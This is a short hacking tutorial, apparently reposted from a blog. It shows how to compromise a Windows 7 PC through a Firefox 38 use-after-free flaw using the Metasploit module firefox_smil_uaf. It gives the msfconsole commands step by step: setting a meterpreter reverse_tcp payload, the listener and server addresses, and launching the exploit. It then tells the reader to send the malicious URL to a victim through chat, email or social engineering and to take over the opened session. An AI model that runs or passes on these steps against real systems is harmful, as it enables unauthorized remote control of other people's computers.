Hack Windows PC using Firefox nsSMIL Time Container: :Notify Time Change() RCE

This module exploits an out-of-bounds indexing/use-after-free condition present in nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox on Microsoft Windows.

Exploit Targets

Firefox 38

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/browser/firefox_smil_uaf

msf exploit (firefox_smil_uaf)>set payload windows/meterpreter/reverse_tcp

msf exploit (firefox_smil_uaf)>set lhost 192.168.0.104 (IP of Local Host)

msf exploit (firefox_smil_uaf)>set srvhost 192.168.0.104 (IP of Local Host)

msf exploit (firefox_smil_uaf)>set uripath / (IP of Local Host)

msf exploit (firefox_smil_uaf)>exploit

Now an URL you should give to your victim http://192.168.0.104:8080/ victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Related Posts Plugin for WordPress, Blogger...

Source: www.hackingarticles.in
Hack Windows PC using Firefox nsSMIL Time Container: :Notify Time Change() RCE Hack Windows PC using Firefox nsSMIL Time Container: :Notify Time Change() RCE Reviewed by Unknown on 9:55 AM Rating: 5